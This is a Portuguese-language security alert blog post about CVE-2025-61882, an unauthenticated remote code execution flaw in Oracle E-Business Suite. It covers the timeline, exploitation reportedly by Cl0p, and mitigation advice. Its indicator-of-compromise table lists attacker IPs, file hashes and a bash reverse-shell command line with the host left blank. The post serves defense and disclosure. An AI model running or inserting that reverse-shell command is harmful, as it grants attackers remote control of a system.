ICS Labs Outbreak Alert - Oracle EBS Vulnerabilidade Crítica (CVE 2025-61882)
- thiagosouza77
- 6 de out.
- 2 min de leitura
Atualizado: 7 de out.


A Oracle EBS (E-Business Suite) está alertando sobre uma vulnerabilidade crítica reconhecida pelo CVE-2025-61882 classificada como crítica (CVSS 9.8) que afeta especificamente o componente Concurrent Processing com integração ao BI Publisher, nas versões 12.2.3 até 12.2.14. Essa vulnerabilidade permite a execução remota de código (RCE) sem necessidade de autenticação, o que possibilita que um invasor explore o sistema através de requisições HTTP sem precisar de muito esforço técnico obtendo controle total do servidor afetado.
Exploração Ativa e Ameaça Real:
Os relatórios recentes indicam que a exploração começou silenciosamente em Agosto, mas ganhou força em Setembro, com diversas organizações reportando incidentes graves. Há indícios que essa vulnerabilidade está sendo explorada ativamente pelo grupo Ransomware Cl0p extremamente conhecidos por ataques de sequestro de dados. Em ambientes corporativos que utilizam o Oracle EBS exposto à internet, o risco de comprometimento é elevado, podendo resultar em sequestro de informações, movimentação lateral e interrupção de processos críticos de negócio.
Linha do tempo da CVE:
04 de Outubro de 2025: Divulgação e Classificação Crítica
Alerta da Oracle: A Oracle emite o primeiro alerta de segurança, reconhecendo a vulnerabilidade.
Publicação no NVD: O National Vulnerability Database (NVD) dos EUA publica os detalhes iniciais da CVE.
Escalação da Gravidade: Em poucas horas, a vulnerabilidade é classificada com uma pontuação CVSS de 9.8, indicando sua máxima criticidade.
05 de Outubro de 2025: Oficialização do Registro
Registro da CVE: O NVD recebe e oficializa o registro da nova CVE, encaminhado pela Oracle.
06 de Outubro de 2025: Confirmação de Exploração Ativa
Aviso do NCSC: O Centro Nacional de Segurança Cibernética (NCSC) do Reino Unido emite um aviso formal de que a vulnerabilidade está sendo ativamente explorada por agentes maliciosos.
Inclusão no Catálogo da CISA: A Agência de Segurança Cibernética e de Infraestrutura (CISA) dos EUA adiciona a CVE-2025-61882 ao seu "Catálogo de Vulnerabilidades Exploradas Conhecidas". Esta ação sinaliza um risco iminente e comprovado para as organizações.
Recomendações:
A resposta da Oracle veio com um patch emergencial lançado neste mês, mas sua aplicação exige que o Critical Patch Update de outubro de 2023 esteja previamente instalado, um obstáculo para empresas que não mantêm seus ambientes atualizados. Enquanto o patch não é aplicado, recomenda-se restringir o acesso ao sistema via firewall, implementar regras específicas em Web Application Firewalls (WAF), e intensificar a monitoração dos servidores. A mitigação completa requer revisão da arquitetura, segmentação de rede e monitoramento contínuo para detectar possíveis comprometimentos. A CVE-2025-61882 é mais do que uma vulnerabilidade técnica, é um alerta sobre os riscos da negligência na manutenção de sistemas críticos. A resposta rápida é essencial para proteger os ativos corporativos e garantir a continuidade dos negócios. As equipes de segurança devem priorizar a investigação de indicadores de comprometimento e reforçar suas estratégias de defesa.
IOCs:
INDICADORES | TIPO |
200[.]107[.]207[.]26 185[.]181[.]60[.]11 | IP |
sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Comando |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 |
Atenção: Os endereços IP mencionados acima podem ainda estar ativos. Tenha cautela ao manusear e não acesse diretamente para evitar exposição a conteúdo malicioso.





Comentários